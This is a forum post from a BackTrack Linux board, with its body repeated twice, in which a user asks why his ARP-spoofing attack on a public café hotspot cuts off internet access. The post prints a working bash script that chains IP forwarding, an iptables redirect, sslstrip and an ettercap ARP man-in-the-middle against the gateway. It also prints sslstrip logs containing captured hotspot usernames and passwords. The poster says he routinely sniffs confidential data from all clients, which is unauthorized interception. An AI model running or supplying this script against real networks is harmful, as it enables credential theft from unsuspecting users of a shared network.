problem with ettercap+sslstrip in wlan network.very strange my internet network down.

**paul007** · 11-24-2009, 06:17 PM

this is the scenario,
i am using BT4 prefinal version (USB DEVICE with two partition, FAT and EXT3), i am running it in the wireless network unencrypted security mode for the LAN, which support web based authentication to connect into the internet, ...

first case is

my ip assigned as 10.111.111.22
ip gateway as 10.111.111.254

but when i scanned to find out alive hosts, i got 254 hosts alive...but i'm not sure about it, since when i'am counting the client on there is just less than 20 person!!
so i leave this, i try to go into the next step as i usually doing with sslstrip and ettercap!!

this is my script:

Code:

 #!/bin/bash          
OUTFILE="sslstrip"-$(date).txt
mkdir /mnt/sdb2
mount /dev/sdb2 /mnt/sdb2
cd /mnt/sdb2/changes/sslstrip-0.6
python ./setup.py install
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
python ./sslstrip.py -p -l 8080 -w "$OUTFILE"
ettercap -i wlan0 -Tq -M ARP /10.111.111.254/ // // -P autoadd

second case is
if i'am running this scripts, immediately i cannot access internet service, whatever i want to try to access, then the web pages redirect into the login page (need to reauthenticate).

and when i'm check the sslstrips logs file...i just got this shit stuff

Code:

dst=popup=true&username=MEJA+8&password=795540130
2009-11-24 19:26:58,279 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=7955401330
2009-11-24 19:27:41,988 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=79554030
2009-11-24 19:28:11,594 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=&password=m
2009-11-24 19:28:28,024 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8&password=795540130
2009-11-24 19:31:09,254 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626
2009-11-24 19:31:41,342 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626

nothing i got!!

what is my problem bro?? i always successfully sniff any confidentials data on all clients if the type of wireless network security not using web based authentication that use username or password to logon!!!

this is the scenario,
i am using BT4 prefinal version (USB DEVICE with two partition, FAT and EXT3), i am running it in the wireless network unencrypted security mode for the LAN, which support web based authentication to connect into the internet, ...

first case is

my ip assigned as 10.111.111.22
ip gateway as 10.111.111.254

but when i scanned to find out alive hosts, i got 254 hosts alive...but i'm not sure about it, since when i'am counting the client on there is just less than 20 person!!
so i leave this, i try to go into the next step as i usually doing with sslstrip and ettercap!!

this is my script:

Code:

#!/bin/bash          
OUTFILE="sslstrip"-$(date).txt
mkdir /mnt/sdb2
mount /dev/sdb2 /mnt/sdb2
cd /mnt/sdb2/changes/sslstrip-0.6
python ./setup.py install
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
python ./sslstrip.py -p -l 8080 -w "$OUTFILE"
ettercap -i wlan0 -Tq -M ARP /10.111.111.254/ // // -P autoadd

second case is
if i'am running this scripts, immediately i cannot access internet service, whatever i want to try to access, then the web pages redirect into the login page (need to reauthenticate).

and when i'm check the sslstrips logs file...i just got this shit stuff

Code:

dst=popup=true&username=MEJA+8&password=795540130
2009-11-24 19:26:58,279 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=7955401330
2009-11-24 19:27:41,988 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Freqs.php&popup=true&username=MEJA+8&password=79554030
2009-11-24 19:28:11,594 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=&password=m
2009-11-24 19:28:28,024 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8&password=795540130
2009-11-24 19:31:09,254 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626
2009-11-24 19:31:41,342 POST Data (hotspot-roemahkopi.net.id):
dst=%3A%2F%2F%2Fhome.php%3F&popup=true&username=MEJA+8A&password=992626

i just got user pass data that try to authenticated through web based to get granted access into the internet!!!

what is my problem bro?? i always successfully sniff any confidentials data on all clients if the type of wireless network security not using web based authentication that use username or password to logon!!!

BackTrack Linux - Penetration Testing Distribution

Thread: problem with ettercap+sslstrip in wlan network.very strange my internet network down.

Thread Tools

Search Thread

Display

Threaded View

Posting Permissions